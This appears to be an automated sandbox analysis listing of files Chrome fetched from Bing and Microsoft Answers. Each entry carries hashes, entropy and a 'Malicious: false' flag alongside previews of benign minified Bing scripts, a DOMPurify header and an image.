                                                                            Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):287
                                                                            Entropy (8bit):5.108035590716981
                                                                            Encrypted:false
                                                                            SSDEEP:6:qUJd/ckDPodheRAgO9lVGGL5yKJOjkbVwhV7HzLBq92NY:02kUc5y6Oobm/O
                                                                            MD5:BED1CC02420CF32C17391E0398E3CA5A
                                                                            SHA1:3E1090349900BDB30176F5DD1795872CFCFADB26
                                                                            SHA-256:217ACB853DC6E85C93C8BFA3A6C1D75A921A431DB1A84CC6BC7E7AFD38BF4AD9
                                                                            SHA-512:869D58EA5C29FFA8F782B52CE40EE4163ABE5C3BBD324265D01AB108B63F9B9D4F861B34A659A5BB8C505D18FD214A9D7A7DC8754365C6DADB3D94E4EF0ACF4A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/PhCQNJkAvbMBdvXdF5WHLPz62yY.js
                                                                            Preview:var wlc=function(n,t,i){var u,f,r;n&&Identity&&(u=Identity.popupLoginUrls)&&(f=u.WindowsLiveId)&&Identity.wlProfile&&(r=_d.createElement("iframe"),r.style.display="none",r.src=f+"&checkda=1",r.setAttribute("data-priority","2"),_d.body.appendChild(r),i&&t&&t("SRCHHPGUSR","WTS",i,1,"/"))}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (655), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):655
                                                                            Entropy (8bit):5.099317890582633
                                                                            Encrypted:false
                                                                            SSDEEP:12:hFzzqZv5xq5AkrF8TXIiexy0qcwvgPnwnB5OM+DPYqQRXK:hFzzoC+kFQ4iex25+wB5OZsqQRXK
                                                                            MD5:3E4EDB2EB04A481FA178A913B0BE387A
                                                                            SHA1:1261BE5CC20C09CABCCE67150413BB8E41444401
                                                                            SHA-256:2D4A25AD08E943D4EA3F7FA7C1B17350EF6759B8C99FAC2501F9B1920F2E9B48
                                                                            SHA-512:96605553E8EAC4F95033242EC19F79A80D2F42D36BB01D564073CCDD6D78F509DD9046EDAD7EA5F6A02F1718AE927002F424DAFD9F61D30F44C66CD898B2953B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var sj_ajax=function(n,t){function c(){i[u]=h;i.abort&&i.abort()}function s(n,t){typeof n=="function"&&n(t,{request:i,appendTo:function(n){i&&sj_appHTML(n,i.responseText)}})}var r,i=sj_gx(),u="onreadystatechange",f,e=null,o,l=sb_st,a=sb_ct,h=function(){};if(!n||!i){s(r,!1);return}i.open("get",n,!0);t&&(r=t.callback,f=t.timeout,o=t.headers,Object.keys(o||{}).forEach(function(n){i.setRequestHeader(n,o[n])}),t.withCredentials!==undefined&&(i.withCredentials=t.withCredentials));i[u]=function(){if(i.readyState===4){var n=!1;e!==null&&a(e);i.status===200&&(n=!0,i[u]=h);s(r,n)}};sj_evt.bind("ajax.unload",c);i.send();f>0&&(e=l(function(){c();s(r,!1)},f))}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (766), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):766
                                                                            Entropy (8bit):5.203139850451521
                                                                            Encrypted:false
                                                                            SSDEEP:12:yWVV+7k6tzEXjBSLp9OXZ7jnuqTY+OPKfzKbFTCDfuwhlz+1q6poqQqSMyS75rgt:LVVwk6REXU9ONSqTYHPQwTCDuw61q6pI
                                                                            MD5:7BE60932F0676B35F83FBCFF69473A88
                                                                            SHA1:12EF061B866583A77B864C90C3B6C3EC6AA5721D
                                                                            SHA-256:5BC502C29B274DBCEC1A0FB1840AE397BF6B8D0E8310FFAD628331D92A33CD67
                                                                            SHA-512:2C7BD4C070C75E9757E674C3ECE1CBBBFFF5E3D2A4B414902CD1857DDC762269605005C531E73F363C7FE73FF82D30F2D910A8E6060CD11225179C14B52FCBAF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var BingAtWork;(function(n){var t;(function(){function h(){var t=f.value;/\S/.test(t)&&n()}function c(t){var i=t[0],r=t[1],u=t[2];n()}function l(n){var t=n&&n.length>1&&n[1];t&&Lib.CssClass.contains(t,"b_searchbox")&&t.id!=s&&a()}function a(){Lib.CssClass.add(sj_b,u)}function n(){Lib.CssClass.remove(sj_b,u)}function v(){sj_evt.bind("autosuggestHide",c,!0);sj_evt.bind("focusChange",l,!0);t&&sj_be(t,"submit",h)}function i(){(n(),r)||(t=_ge(e),f=_ge(o),r=!0,v())}var r=!1,u="as_on",e="sb_form",o="sb_form_q",s="uaseabox",t,f;sj_be(_d,"DOMContentLoaded",i);sj_evt.bind("onP1",i,!0);sj_evt.bind("ajax.load",i,!0);sj_evt.bind("pagehide",n);sj_evt.bind("ajax.unload",n)})(t=n.HeaderWithAutoSuggestState||(n.HeaderWithAutoSuggestState={}))})(BingAtWork||(BingAtWork={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1730), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1730
                                                                            Entropy (8bit):5.167868795030358
                                                                            Encrypted:false
                                                                            SSDEEP:24:ppStAKm2ZNFPiXKK741zr79qrEK7771SZmnSu7kZwlxGHDF1X7IIct7JFq2n7026:wA/obHGb0PZwvGjYgjOJ/pOh1KtG
                                                                            MD5:71FEF373F46027630BC21602EBFD88DD
                                                                            SHA1:06291B5A7CFD861782E6FE2E8BF26BEAF8B45CA3
                                                                            SHA-256:1AC2C984ED3BB8AF20CE6345D79F87A72343EC63B342DC35B1B331799E126377
                                                                            SHA-512:848CCD93DAA0BFF6DA1ADA4B031B47E984841BD4D8FAB3478D58F686B22C83BCCC0594E75589B1EB1EBC0C71234B7BBF43D4BB423613475B098C059ABCE672DF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SkipToContent;(function(){function n(n,t){sj_log===null||sj_log===void 0?void 0:sj_log("CI.".concat(r),n,t!==null&&t!==void 0?t:"1")}function u(t){t&&t.key==="Tab"&&i&&(n("FirstAppear"),i=!1)}function f(){var r,u,f,e,o,s,h,c,l,a,v,y,n=(u=(r=document.querySelector("cib-serp"))===null||r===void 0?void 0:r.shadowRoot)===null||u===void 0?void 0:u.querySelector("cib-conversation"),p=(n===null||n===void 0?void 0:n.getAttribute("chat-type"))==="consumer",w=(o=(e=(f=n===null||n===void 0?void 0:n.shadowRoot)===null||f===void 0?void 0:f.querySelector("cib-welcome-container"))===null||e===void 0?void 0:e.shadowRoot)===null||o===void 0?void 0:o.querySelector(".legal-items a"),t,i;n&&w&&!p?t=w:n&&p&&(i=document.querySelector("cib-serp .b_ziCont"),t=i&&i.style.display!=="none"?i.querySelector(".slide[tabindex='0']"):(y=(v=(a=(l=(c=(h=(s=n.shadowRoot)===null||s===void 0?void 0:s.querySelector("cib-chat-turn"))===null||h===void 0?void 0:h.shadowRoot)===null||c===void 0?void 0:c.querySelector("cib-
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (836), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):836
                                                                            Entropy (8bit):4.858167659931382
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q+eYdiYodiondjOpBYyMmkIzJNMAbm79PkXTpB8eMUm7QDmkXaWhBxldM:2Q+eY/AM7vu78mZMDr/M
                                                                            MD5:02DBE1B08948A345311FDF0393604FE3
                                                                            SHA1:A1C1D3EC09E80B3480DF001F4CFB351AFD09DD45
                                                                            SHA-256:F80560FBF1EA024970226F3995C031CEA0116A6741593AF394AD9CD55499F12C
                                                                            SHA-512:FD911C725EF9C51BDB579B922BDCCAA60765C431C7695978D1F35FF6181D0672DE32FF0C33805313FA90AF326BCEE517D865131621670BE6E5EF6BE0B87ADD62
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){var r=!1,n=_ge("scope_tools_wrapper"),t=_ge("b_tween_searchResults"),u=_ge("b_tween_searchTools"),i=_ge("b_tween"),e=_ge("b_topw"),f=!1;n&&u&&i&&(f=Lib.CssClass.contains(i,"b_hidetoggletween"),Lib.CssClass.contains(u,"b_hide")||(Lib.CssClass.add(n,"active"),r=!0),Lib.CssClass.remove(n,"b_hide"),sj_be(n,"click",function(){r?(!t&&e&&Lib.CssClass.add(i,"b_hidetoggletween"),_w.sj_log&&sj_log("CI.tweenToggle","hideTools","1"),Lib.CssClass.remove(n,"active"),Lib.CssClass.add(u,"b_hide"),t&&Lib.CssClass.remove(t,"b_hide"),f&&Lib.CssClass.add(i,"b_hidetoggletween"),r=!1):(!t&&e&&Lib.CssClass.remove(i,"b_hidetoggletween"),_w.sj_log&&sj_log("CI.tweenToggle","showTools","1"),Lib.CssClass.add(n,"active"),Lib.CssClass.remove(u,"b_hide"),t&&Lib.CssClass.add(t,"b_hide"),f&&Lib.CssClass.remove(i,"b_hidetoggletween"),r=!0)}))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (379), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):379
                                                                            Entropy (8bit):5.122348535910386
                                                                            Encrypted:false
                                                                            SSDEEP:6:AWKzCNWDJMuLPQCtkINKzQIT8mX8ROI2MBUVQqE2rTDhZQ2DaDmUJpowu2Y:AWKLJFPbkI63wmXRI2MyVk2HDhZ1magO
                                                                            MD5:B0036EA73C514B92A3FB402BD49BD831
                                                                            SHA1:DC80BDFF167E521D00D778113E1DD28C2AEE5EEE
                                                                            SHA-256:F004C1447AECB7B95C96A067AFBEF6E999BC1A6DABBD7901237DE5E85BF85336
                                                                            SHA-512:64517355C84D9040324B2845C54F1A956D1462EBF45E0016181F5F5041931A98A72076D926BBDF18518662F978BF8B5C2051B0A1C2810E29F7A21DEE7FAA2935
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:function wpc_Inst(n,t,i){var r=sj_evt.bind,u=0,f=0;r&&n&&t&&i&&(r("RMS.ImgAOLInit",function(){n.register(i)},1),r("RMS.ImgAOLCompleted",function(){n.schedule({task:function(){n.recordTimings(i,u,f);n.complete(i)}})},1),r("RMS.ImgAOLLoaded",function(n){var i,e,r;n.length<2||(i=n[1],i&&i.state==="success")&&(e=i.image,e&&sj_we(e,t))&&(r=i.timeStamp,u===0&&(u=r),r>f&&(f=r))},1))}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):242
                                                                            Entropy (8bit):4.86807996961474
                                                                            Encrypted:false
                                                                            SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                            MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                            SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                            SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                            SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/t6Bkpkzq5ckAnvfW2PY7kNOTPJ0.js
                                                                            Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (22608), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):22837
                                                                            Entropy (8bit):5.3380357579661375
                                                                            Encrypted:false
                                                                            SSDEEP:384:ye4g/CcCfVTwC0riJs7vv8WlMP9AP1lEnkYGy2K3S9Mw07QRZvlytYA14:ocCcC+C0rbjv8mMPy7vYGy2K3S+w2QRJ
                                                                            MD5:C8AE49581C972FEC0197BB1CA0612760
                                                                            SHA1:9E951428B69DF0BFDD5D476BAC425088CD925ED8
                                                                            SHA-256:6F52AF6168A33EE031281E3FF3F72323FF6A993D960978B8D778641366B09869
                                                                            SHA-512:4782A72A121FC9D573DC13182B786107250D522F4B0ED178F68221D4F73358B57ADCFBE74594CB4B3CF848B88A27BB5E466267A5F9B9DF5032FDACC0BAB5DEC2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/lib/purify.min.js
                                                                            Preview:/*! @license DOMPurify 3.0.0 | (c) Cure53 and other contributors | Released under the Apache license 2.0 and Mozilla Public License 2.0 | github.com/cure53/DOMPurify/blob/3.0.0/LICENSE */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).DOMPurify=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,n){return t=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e},t(e,n)}function n(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch(e){return!1}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (606), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):606
                                                                            Entropy (8bit):5.268639530160161
                                                                            Encrypted:false
                                                                            SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                            MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                            SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                            SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                            SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rs/6r/x2/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w
                                                                            Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 220 x 220, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):48104
                                                                            Entropy (8bit):7.97636579582501
                                                                            Encrypted:false
                                                                            SSDEEP:768:Z2/UzXs2bvspcwIB4/icS7LSJJUtfPWqV8ly7bsxsS9KIyGryZXM9Bjdhan:Z2/GXs2Q+JcS7OJIPWqVK5sKKHUhdhan
                                                                            MD5:6D6A15AA64640B758BEB209C94620D07
                                                                            SHA1:02114FA9F03290727C2DBD3A899DC16B01B9BB25
                                                                            SHA-256:0C2A03C10B68F4C29EA25CB3D8D6BA673DA061EB16B5832032100123411351C9
                                                                            SHA-512:28A2C4F750A63EF7233226CA01539C2A102244C0CF05E6ABE1DA29F3616769C7E933DDF57A4C0CE63162378A638B8D19F61AD7F2254FB0B98DFE274850A77246
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.PNG........IHDR..............Z.....sRGB.........gAMA......a.....pHYs..........o.d...}IDATx^..x\...m.BK.$333333cbf.........3S.&.4......q.4...........93..g.{..-J....g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........c|..k..W.q...k.].......6..kD..E.f....!M..!!!.3d.0!].tCC3e.6m.F...\..."8f.'.....g..n.bK....s...{.......#G-.8q.nS....Xp.......;..a.._u...]'L..@....'.e..f..7.e...I..../.K.~....6...i.\...K.:.!^ON.*.....{&q.>.....j.?.3....t.R.IW.i.l..........w.....'>.o..7..X..M.M..f.?bs...y.O....l.O...?...'ZT...W.4..,$S&.9.e..2.X.igY8..%.;f..2qL.85...>.9.....wS.Is...x...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1255), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1255
                                                                            Entropy (8bit):5.160709455885502
                                                                            Encrypted:false
                                                                            SSDEEP:24:SRW9/dnlg/izSunyL3XC/A/o5VFoz/o7gi6mA/Jmd16g7DbYEgSn:Sw9/dlgTunyjC/A/xM7gB/JW6g7DbYEH
                                                                            MD5:41F20604918FA0BE3BB77A96E4308794
                                                                            SHA1:38593C2497F4F4D48026078ECFEDE72F1DFC44B5
                                                                            SHA-256:B1F4F444BED02032B37697FF69D62B7A3F8B291CB6F129E2291C234C23C85E25
                                                                            SHA-512:606C2631A625CA0EDD6C7E9730E353FE8C07B612F48D1B3244B13299B49C28C97AA6DBC6092DED8CAE3F6B087E3FC5E2BB2E916DDE5C3FCC87553DCFCDEAB13C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/OFk8JJf09NSAJgeOz-3nLx38RLU.js
                                                                            Preview:function init(){for(var i,t=_d.getElementsByClassName("toggle_item"),n=0;n<t.length;n++)i=t[n],ToggleControl.createToggleControl(i.id)}var ToggleControlImpl;(function(n){function v(n){var t,i,h,c;r=_w.hp_addclass;u=_w.hp_removeclass;t=_ge(n);i=_ge(n+e);t&&i&&(h=function(){return f(t,i,n)},c=function(n){var t=n.which||n.keyCode;(t==13||t==32)&&(sj_pd(n),h())},sj_be(t,o,h),sj_be(t,s,c))}function f(n,f,e){var o;if(r&&u){if(f.className.indexOf(t)>-1)return;o=f.className.indexOf(i)>-1;o?u(f,i):r(f,i)}else{if(Lib.CssClass.contains(f,t))return;o=Lib.CssClass.contains(f,i);Lib.CssClass.toggle(f,i)}Log.Log("Click","Button",o?"ToggleOff":"ToggleOn",!1,"AppNS",n.getAttribute("data-appns"),"K",n.getAttribute("data-k"),"Category","CommonControls");n.setAttribute(l,o?"false":"true");sj_evt.fire(e+h,!o)}function y(n,i,f){var e;r&&u?(e=i.className.indexOf(t)>-1,e?u(i,t):r(i,t)):(e=Lib.CssClass.contains(i,t),Lib.CssClass.toggle(i,t));n.setAttribute(a,e?"false":"true");sj_evt.fire(f+c,!e)}var e="_ctrl",
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (889), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):889
                                                                            Entropy (8bit):5.3584953507061615
                                                                            Encrypted:false
                                                                            SSDEEP:24:dyOxb3thgU0Z7SWur4GkWe2MpuB5zQuCn0k+S:dvbd+UWWjk/5b+S
                                                                            MD5:285ED914665223C4517AF6DF060811D9
                                                                            SHA1:B2B69DD7EE59DB931F242E5E258492AE96A2F16D
                                                                            SHA-256:3FA599CC8AEEC7458CB69755C4C7EA9EF3615A624F9910BA527F6946C6A763F9
                                                                            SHA-512:35A561B971EE4E2122B6246800F897E103803ADEE8436373622748050FC846263C9D8089EE0E5F323A67F4130FAB36BCDFBB4C3F5721B13688FD67516BB4706B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/srad1-5Z25MfJC5eJYSSrpai8W0.js
                                                                            Preview:var AccessibilityZoomDesktop;(function(){if(typeof sj_cook!="undefined"){var n="SRCHHPGUSR",t="PCMobUX",i="1";r();_w.addEventListener("resize",function(){return r()});function u(i){if(sj_cook.set(n,t,i,!0,"/"),sj_cook.get(n,t)!==i){typeof sj_log=="function"&&sj_log("CI.Info","cookie","read");return}sb_st(function(){_w.location.reload()},10)}function f(){var t=sj_cook.get(n,"WEBTHEME"),i=sj_cook.get(n,"THEME");t==="0"||t==="1"||t==="2"?sj_cook.set(n,"THEME",t,!0,"/"):i!=null&&sj_cook.set(n,"THEME","0",!0,"/")}function r(){var r=1;r=navigator&&navigator.userAgent.match(/Edge/)&&_w.screen?screen.deviceXDPI/screen.systemXDPI:navigator&&(navigator.userAgent.match(/Firefox/ig)||navigator.userAgent.match(/Trident/))?_w.devicePixelRatio:_w.outerWidth/_w.innerWidth;r>=4&&_w.devicePixelRatio>=4&&sj_cook.get(n,t)!=i&&(f(),u(i))}}})(AccessibilityZoomDesktop||(AccessibilityZoomDesktop={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (16860), with CRLF, LF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):99073
                                                                            Entropy (8bit):5.725080426677518
                                                                            Encrypted:false
                                                                            SSDEEP:1536:mJZq/7hXgHZf4fJ4T3Z/1QoL9/Jvy9oEYZ93SaGADFjWP5VSt/c4oj0USY2loCVe:wmX8fr9/Jq9oEYZ5tfojh2lvG
                                                                            MD5:BDC849A032F2544EA7BADB4A3219B141
                                                                            SHA1:E8E8E5E2E502E856817A4893026A364F8C2CCF58
                                                                            SHA-256:81C5F978FAE34C8040997A0AC07E5FDD07F77C28484654FDAB377B2DDD2DFE01
                                                                            SHA-512:4C4087B6F851C40B0849FE25CE1255C2EBC7A2A62B23FB9B9A342E0918E88565D698C3EBDB99326DB1E8FD4656289717DB4891AFA96B0B9856403E217B7DA3BD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://www.bing.com/search?q=office
                                                                            Preview:<!DOCTYPE html><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript" nonce="c7RgPiUm+G6lTmvtZNT48Ap1FXEyypXlL0CZoBzp/0s=" >//<![CDATA[..si_ST=new Date..// </script><head> pc--><title>office - Search</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><meta name="referrer" content="origin-when-cross-origin" /><meta name="SystemEntropyOriginTrialToken" content="A1L3tx5CzccqjN3lK6st/fXMwhf9EeokCPf8XCt0DVI8JPbg37BWq0zKvlqgkdm8YEUbthoGkC/xdR1+iIz4txAAAABxeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiTXNVc2VyQWdlbnRMYXVuY2hOYXZUeXBlIiwiZXhwaXJ5IjoxNzM5NzI0MzExLCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" http-equiv="origin-trial" /><meta property="og:description" content="Intelligent search from Bing makes it easier to quickly find what you.re looking for and rewards you." /><meta property="og:site_name" content="Bing" /><meta property="og:title" content="office - B
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (511), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):511
                                                                            Entropy (8bit):4.980041296618112
                                                                            Encrypted:false
                                                                            SSDEEP:12:yWF4eguIWKvU9bEMsR5OErixCvJO1Vi5rgsM:LF4mKctEMYOK4CvJUVYM
                                                                            MD5:D6741608BA48E400A406ACA7F3464765
                                                                            SHA1:8961CA85AD82BB701436FFC64642833CFBAFF303
                                                                            SHA-256:B1DB1D8C0E5316D2C8A14E778B7220AC75ADAE5333A6D58BA7FD07F4E6EAA83C
                                                                            SHA-512:E85360DBBB0881792B86DCAF56789434152ED69E00A99202B880F19D551B8C78EEFF38A5836024F5D61DBC36818A39A921957F13FBF592BAAFD06ACB1AED244B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/iWHKha2Cu3AUNv_GRkKDPPuv8wM.js
                                                                            Preview:var BingAtWork;(function(n){var t;(function(n){function t(t,i){var u,r;t.isAuthenticated&&(n.raiseAuthEventAndLog(t),u=_ge("sb_form_q"),u&&(r=u.getAttribute("value"),r&&(n.fetchLowerHeader(r),n.fetchScopeBar(r),i.notifEnabled&&i.notifFetchAsync&&n.fetchNotificationConditional())))}function i(n,i){n&&n.length==2&&t(n[1],i)}n.bindToConditionalSignIn=function(n){sj_evt.bind("ssofirstquery",function(t){return i(t,n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):274
                                                                            Entropy (8bit):5.183310044763656
                                                                            Encrypted:false
                                                                            SSDEEP:6:qNVDvMdCOEy4N7M1LDKENosMxFC7KD/xRuMVsman:wpGRGN7k60osMxF5CMVsman
                                                                            MD5:08CAA80B9EBEDD92F3B935AB00AE92EE
                                                                            SHA1:D795BB0FA8604D0A0F0F9550B0DC6046794A7501
                                                                            SHA-256:E2DE191955DB0403BC58126B270E891F5FD7C2BE9EB78DC07C893C10F87CEBA2
                                                                            SHA-512:683C328377D7F435FD18A85A65585F06E3F232E066E72AFCBF54402A1B1A1153E51AA94E479C22915A98BB7CAB9F3D7D9C0EE3305AFB9670AF5EAEE56612E2F4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SearchBox;(function(n){function u(){t=_ge("b_header");sj_be(_d.body,"click",i)}function i(n){var i=sj_et(n);i.id!="sb_form_q"&&(t.className=t.className.replace(r,""))}var r=/(^|\s)b_focus(?!\S)/gi,t;n.removeFocusClass=i;sj_evt.bind("onP1",u)})(SearchBox||(SearchBox={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1663), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1663
                                                                            Entropy (8bit):5.118614360470706
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QAKJFFGRc/spJg2WNaQorUcn7RzdAHWd3TRdZhtRkYAe/V5r0nA97StrLntMPU6:wKJFkimqjcrw4D/tD9VWcS1etkEy96vZ
                                                                            MD5:D81844C2EBCF5F3260A692E3E89DDE7F
                                                                            SHA1:5A3874FB9F597E42FDD94E5BC5DA0A709B70D57A
                                                                            SHA-256:9905F086F3F40AC4B8EC2C9F0752A157ED637B2FFC2C87971E8306D6CB12FE9F
                                                                            SHA-512:8005F3EBD5BC8DC903917DF581563595EA3E427F31992260AA4E6ED8BC30095442174AD153A83C378575FFB2DE878338B0E87D8CDD57DFDC49E646CA9E4ADA77
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Wjh0-59ZfkL92U5bxdoKcJtw1Xo.js
